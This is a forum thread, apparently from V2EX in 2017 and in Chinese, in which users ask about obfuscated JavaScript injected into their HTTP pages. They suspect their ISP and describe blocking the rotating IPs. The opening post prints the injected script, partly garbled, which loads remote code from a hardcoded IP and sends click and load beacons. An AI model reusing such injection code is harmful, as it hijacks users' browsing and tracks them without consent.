这段 JS 劫持代码什么意思？

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

已注册用户请登录

这是一个创建于 2860 天前的主题，其中的信息可能已经有所发展或是发生改变。

var _$ = ['DIV20170608', "document", "getElementsByTagName", 'div', "length", "push", "clientWidth", "clientHeight", "createElement", 'script', "src", 'http://121.31.40.177:88/x.js?id=', '&s=', 'x', "id", "style", "display", 'none', "dataset", "isReplace", "appendChild", "overflow", 'hidden', " onload", "bind", 'Y', "innerHTML", '', 'block', "width", 'px', "height", "activeElement", "parentElement", "getAttribute", 'id', "indexOf", 'http://121.31.40.177:88/s.do?id=h00000003&click', "offsetWidth", "offsetHeight", "parentNode", "isPush", "addEventListener", 'load', 'http://121.31.40.177:88/s.do?id=h00000003&loadNum=']; !
function() {
var a = [];
var b = 0x3;
var c = _$[0];
var d = 0x0;
var e = {};
var f = false;
var g = 0x0;
function loadAd() {
var k = [0x78, 0x7d, 0xa0, 0xb4, 0xc8, 0xea, 0xfa, 0x12c, 0x150, 0x168, 0x1d4, 0x1e0, 0x1f4, 0x244, 0x280, 0x2d8, 0x2f8, 0x3c0];
var l = [0x3c, 0x7d, 0x258, 0x96, 0xc8, 0x3c, 0xfa, 0xfa, 0x118, 0x96, 0x3c, 0xa0, 0xc8, 0x5a, 0x3c, 0x5a, 0x3c, 0x3c];
var m = window[_$[1]][_$[2]](_$[3]);
for (var n = 0x0; n - 0x1) {
r = !0x0; (new Image)[_$[10]] = _$[37];
clearTimeout(q)
};
if (!r) {
q = setTimeout(function() {
checkClick(o)
},
0x32)
}
};
function findEle(o, p) {
p = p || 0x3;
if (!o) {
return false
};
for (var q = 0x0; q

12 条回复 2017-12-24 14:10:20 +08:00

cytlz

2017-12-19 14:28:22 +08:00

121 点 31 点 40 点 177:88/l.js

cytlz

2017-12-19 14:29:14 +08:00

求 JS 注释，这段代码是干什么的？

wxsm

2017-12-19 21:23:54 +08:00 via iPhone

弹广告用的

lukunlin

2017-12-20 17:20:54 +08:00

不过就是加密后的代码而已，加密也没什么难的，先是用 window.getElementByTagName('div')
然后创建一个 image 对象，就加载广告图片呗。

neowin

2017-12-23 07:33:53 +08:00

是访问新浪科技、新浪财经时出现的么？

cytlz

2017-12-23 12:39:28 +08:00

@neowin
开机联网上的第一个 http 协议的网站就弹。以后就不弹了，只要换 IP 就再弹一下。
我发的那个 IP 已经不弹了，昨天换了另一个 60 点 12 点 123 点 157:88/l.js
今天早上 157 打不开了，换成 250 了.我看他还换什么 IP

cytlz

2017-12-23 15:51:57 +08:00

@neowin 应该是第一个 http 协议，但后缀必须为 html 的站点才执行那个脚本，浏览器状态栏就显示了一下那个 IP 地址被加载了。但并没有任何广告弹出来。同目录下还有个 i.js ，看样子好象是劫持京东的代码

cytlz

2017-12-23 15:52:43 +08:00

@lukunlin 并没有广告弹出来，页面上也没有加任何广告。

cytlz

2017-12-23 15:53:07 +08:00

@wxsm 没有广告弹出来

cytlz

2017-12-23 15:53:35 +08:00

执行的参数是 l.js?_veri=20121009

neowin

2017-12-24 09:25:28 +08:00

@cytlz 和你的遭遇完全相同。我这京东被支持到广告联盟……然后新浪财经和科技，打开任何其下的新闻页面，状态栏就会有 60.12.123.157 ;121.31.40.177 ，页面要等好几秒才打开，正常都是秒开。我只能在防火墙里 ban 掉这两个 IP，这两天还算正常。话说，这事说到底，就是联通干的？！

cytlz

2017-12-24 14:10:20 +08:00

@neowin 今天换成 42.236.73.204:84 了，代码也变了。a.js c.js s.js k.js.我都给加到 ADB 里过滤了，现在只能发现一个过滤一个。他这东西也不弹窗口。不知道做什么的，烦的很，只要是 html 的后缀他就往里插 JS，然后就卡个好秒才能正常打开页面。但是他这东西只要加载过一次，今天就不加载了，除非你断开网络换 IP 他才重新加载。